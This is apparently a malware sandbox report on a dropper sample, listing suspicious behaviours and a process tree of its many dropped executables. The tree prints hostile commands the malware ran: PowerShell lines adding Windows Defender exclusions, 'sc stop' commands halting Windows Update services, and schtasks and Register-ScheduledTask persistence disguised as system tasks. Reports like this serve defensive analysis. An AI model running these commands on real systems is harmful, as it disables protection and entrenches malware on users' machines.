c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	25072023.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
8248	PING.EXE
9152	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
456	schtasks.exe
6672	schtasks.exe
336	schtasks.exe
6464	schtasks.exe
10992	schtasks.exe
11072	schtasks.exe
6696	Process not Found

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5312	freedom.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe
5140	dos.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
5052	7zFM.exe
4956	firefox.exe
6116	Server.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5052	7zFM.exe
Token: 35	5052	7zFM.exe
Token: SeSecurityPrivilege	5052	7zFM.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	5808	4363463463464363463463463.exe
Token: SeDebugPrivilege	5312	freedom.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4736	4363463463464363463463463.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	5324	powershell.exe
Token: SeDebugPrivilege	5252	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	5312	freedom.exe
Token: SeDebugPrivilege	5312	freedom.exe
Token: SeDebugPrivilege	5312	freedom.exe
Token: SeDebugPrivilege	5312	freedom.exe
Token: SeDebugPrivilege	3292	4363463463464363463463463.exe
Token: SeDebugPrivilege	5496	4363463463464363463463463.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	2892	robotic.exe
Token: SeBackupPrivilege	2892	robotic.exe
Token: SeSecurityPrivilege	2892	robotic.exe
Token: SeSecurityPrivilege	2892	robotic.exe
Token: SeSecurityPrivilege	2892	robotic.exe
Token: SeSecurityPrivilege	2892	robotic.exe
Token: SeDebugPrivilege	4956	firefox.exe
Token: SeDebugPrivilege	220	tasklist.exe
Token: SeDebugPrivilege	5412	Windows.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
5052	7zFM.exe
5052	7zFM.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
1332	Restructuring.pif
1332	Restructuring.pif
1332	Restructuring.pif

Suspicious use of SendNotifyMessage 23 IoCs

pid	Process
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
1332	Restructuring.pif
1332	Restructuring.pif
1332	Restructuring.pif

Suspicious use of SetWindowsHookEx 20 IoCs

pid	Process
4956	firefox.exe
4956	firefox.exe
4980	ZZZ.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
4956	firefox.exe
5312	freedom.exe
5692	PctOccurred.exe
1332	Restructuring.pif
4956	firefox.exe
4956	firefox.exe
5876	RegAsm.exe
5788	loader.exe
1620	RegAsm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2768 wrote to memory of 4956	2768	firefox.exe	105
PID 2768 wrote to memory of 4956	2768	firefox.exe	105
PID 2768 wrote to memory of 4956	2768	firefox.exe	105
PID 2768 wrote to memory of 4956	2768	firefox.exe	105
PID 2768 wrote to memory of 4956	2768	firefox.exe	105
PID 2768 wrote to memory of 4956	2768	firefox.exe	105
PID 2768 wrote to memory of 4956	2768	firefox.exe	105
PID 2768 wrote to memory of 4956	2768	firefox.exe	105
PID 2768 wrote to memory of 4956	2768	firefox.exe	105
PID 2768 wrote to memory of 4956	2768	firefox.exe	105
PID 2768 wrote to memory of 4956	2768	firefox.exe	105
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 3840	4956	firefox.exe	106
PID 4956 wrote to memory of 4360	4956	firefox.exe	107
PID 4956 wrote to memory of 4360	4956	firefox.exe	107
PID 4956 wrote to memory of 4360	4956	firefox.exe	107
PID 4956 wrote to memory of 4360	4956	firefox.exe	107
PID 4956 wrote to memory of 4360	4956	firefox.exe	107
PID 4956 wrote to memory of 4360	4956	firefox.exe	107
PID 4956 wrote to memory of 4360	4956	firefox.exe	107
PID 4956 wrote to memory of 4360	4956	firefox.exe	107

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe.zip"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5052

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2768
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1932 -prefMapHandle 1924 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {04735447-f0ee-417f-80b6-e66c19646b2a} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" gpu
    3⤵
    PID:3840
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2428 -parentBuildID 20240401114208 -prefsHandle 2420 -prefMapHandle 2416 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {11b0176e-37bb-4bf6-8c53-d51223281299} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" socket
    3⤵
    PID:4360
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3292 -childID 1 -isForBrowser -prefsHandle 3296 -prefMapHandle 2880 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aee6d742-02ad-4340-b13a-c9c4ee811203} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:4376
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4364 -childID 2 -isForBrowser -prefsHandle 4356 -prefMapHandle 4352 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {622cc57a-f099-4d0f-b29b-4235531b659c} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:3192
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4852 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4868 -prefMapHandle 4864 -prefsLen 29197 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2f05285-c0e7-4fe3-9341-f7f1669addc4} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" utility
    3⤵
    - Checks processor information in registry
    PID:800
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5348 -childID 3 -isForBrowser -prefsHandle 1456 -prefMapHandle 5312 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3ed206b-5f62-4988-bd4e-3173b8206590} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:5844
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5360 -childID 4 -isForBrowser -prefsHandle 5580 -prefMapHandle 5576 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d49a5b77-24d8-41ee-8783-7c2766f44dac} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:5856
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5496 -childID 5 -isForBrowser -prefsHandle 5712 -prefMapHandle 5716 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f3a6ab4-52f0-4c0d-b049-3816cf92d88c} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:5868
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6116 -childID 6 -isForBrowser -prefsHandle 5984 -prefMapHandle 6120 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1f08f7e-0ae1-42ff-8a54-7e5361ef4c8b} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" tab
    3⤵
    PID:2980
- - C:\Users\Admin\Desktop\4363463463464363463463463.exe
    "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5808
  - - C:\Users\Admin\Desktop\Files\freedom.exe
      "C:\Users\Admin\Desktop\Files\freedom.exe"
      4⤵
      Checks computer location settings
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:5312
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\freedom.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1520
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'freedom.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5324
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5252
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1336
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows" /tr "C:\Users\Admin\Windows.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:456
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      4⤵
      PID:652
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        5⤵
        
        PID:4740
  - - C:\Users\Admin\Desktop\Files\Neverlose%20Loader.exe
      "C:\Users\Admin\Desktop\Files\Neverlose%20Loader.exe"
      4⤵
      PID:6748
  - - C:\Users\Admin\Desktop\Files\1.exe
      "C:\Users\Admin\Desktop\Files\1.exe"
      4⤵
      PID:8756
    - - C:\Windows\sysklnorbcv.exe
        
        C:\Windows\sysklnorbcv.exe
        5⤵
        
        PID:4004
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        
        PID:6464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7720
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
        6⤵
        
        PID:7504
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:4912
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:440
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:5364
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        7⤵
        Launches sc.exe
        
        PID:2788
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        7⤵
        Launches sc.exe
        
        PID:3500
      - C:\Users\Admin\AppData\Local\Temp\2281832279.exe
        
        C:\Users\Admin\AppData\Local\Temp\2281832279.exe
        6⤵
        
        PID:8472
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:6860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
        8⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
        9⤵
        Modifies registry key
        
        PID:8112
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:6972
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager
        8⤵
        
        PID:7236
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /f /tn Windows Upgrade Manager
        9⤵
        
        PID:8584
      - C:\Users\Admin\AppData\Local\Temp\123264193.exe
        
        C:\Users\Admin\AppData\Local\Temp\123264193.exe
        6⤵
        
        PID:6652
      - C:\Users\Admin\AppData\Local\Temp\166022235.exe
        
        C:\Users\Admin\AppData\Local\Temp\166022235.exe
        6⤵
        
        PID:9656
        
        C:\Users\Admin\AppData\Local\Temp\1076039145.exe
        
        C:\Users\Admin\AppData\Local\Temp\1076039145.exe
        7⤵
        
        PID:10916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9376
        
        C:\Windows\System32\schtasks.exe
        
        C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
        8⤵
        
        PID:8504
      - C:\Users\Admin\AppData\Local\Temp\1912021615.exe
        
        C:\Users\Admin\AppData\Local\Temp\1912021615.exe
        6⤵
        
        PID:9584
  - - C:\Users\Admin\Desktop\Files\88851n80.exe
      "C:\Users\Admin\Desktop\Files\88851n80.exe"
      4⤵
      PID:5800
    - - C:\Users\Admin\AppData\Local\WahhVasyaa\88851n80.exe
        
        "C:\Users\Admin\AppData\Local\WahhVasyaa\88851n80.exe"
        5⤵
        
        PID:4048
  - - C:\Users\Admin\Desktop\Files\random.exe
      "C:\Users\Admin\Desktop\Files\random.exe"
      4⤵
      PID:8552
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\klops.exe"
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8036
      - C:\Windows\system32\cmd.exe
        
        cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\klops.exe"
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8016
        
        C:\Windows\system32\PING.EXE
        
        ping localhost -n 1
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8248
        
        C:\Users\Admin\AppData\Local\klops.exe
        
        C:\Users\Admin\AppData\Local\klops.exe
        7⤵
        
        PID:636
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\klops.exe"
        8⤵
        
        PID:8432
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\klops.exe
        
        C:\Users\Admin\AppData\Local\Temp\3582-490\klops.exe
        9⤵
        
        PID:6652
  - - C:\Users\Admin\Desktop\Files\newtpp.exe
      "C:\Users\Admin\Desktop\Files\newtpp.exe"
      4⤵
      PID:8064
    - - C:\Windows\sysnldcvmr.exe
        
        C:\Windows\sysnldcvmr.exe
        5⤵
        
        PID:8628
      - C:\Users\Admin\AppData\Local\Temp\292498554.exe
        
        C:\Users\Admin\AppData\Local\Temp\292498554.exe
        6⤵
        
        PID:8144
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:456
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
        8⤵
        
        PID:8700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Windows Upgrade Manager /f
        9⤵
        Modifies registry key
        
        PID:10592
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:9840
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c schtasks /delete /f /tn Windows Upgrade Manager
        8⤵
        
        PID:11200
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /f /tn Windows Upgrade Manager
        9⤵
        
        PID:2040
      - C:\Users\Admin\AppData\Local\Temp\66549146.exe
        
        C:\Users\Admin\AppData\Local\Temp\66549146.exe
        6⤵
        
        PID:7908
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\Aquarius.exe"
      4⤵
      PID:10328
    - - C:\Users\Admin\Desktop\Files\Aquarius.exe
        
        C:\Users\Admin\Desktop\Files\Aquarius.exe
        5⤵
        
        PID:6192
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E9CB.tmp\E9CC.tmp\E9CD.bat C:\Users\Admin\Desktop\Files\Aquarius.exe"
        6⤵
        
        PID:9928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\E9CB.tmp\E9CC.tmp\E9CD.bat C:\Users\Admin\Desktop\Files\Aquarius.exe
        7⤵
        
        PID:364
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\ggg.exe"
      4⤵
      PID:9128
    - - C:\Users\Admin\Desktop\Files\ggg.exe
        
        C:\Users\Admin\Desktop\Files\ggg.exe
        5⤵
        
        PID:9984
      - C:\Users\Admin\Desktop\Files\ggg.exe
        
        C:\Users\Admin\Desktop\Files\ggg.exe
        6⤵
        
        PID:8568
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\build11.exe"
      4⤵
      PID:7132
    - - C:\Users\Admin\Desktop\Files\build11.exe
        
        C:\Users\Admin\Desktop\Files\build11.exe
        5⤵
        
        PID:7092
      - C:\Users\Admin\AppData\Local\Temp\onefile_7092_133764408997898156\stub.exe
        
        C:\Users\Admin\Desktop\Files\build11.exe
        6⤵
        
        PID:8420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:7484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:7376
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:10408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        7⤵
        
        PID:1832
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:11224
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\neonn.exe"
      4⤵
      PID:5476
    - - C:\Users\Admin\Desktop\Files\neonn.exe
        
        C:\Users\Admin\Desktop\Files\neonn.exe
        5⤵
        
        PID:10360
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\Desktop\Files\PTIHJA~1.EXE"
      4⤵
      PID:9304
    - - C:\Users\Admin\Desktop\Files\PTIHJA~1.EXE
        
        C:\Users\Admin\Desktop\Files\PTIHJA~1.EXE
        5⤵
        
        PID:1112
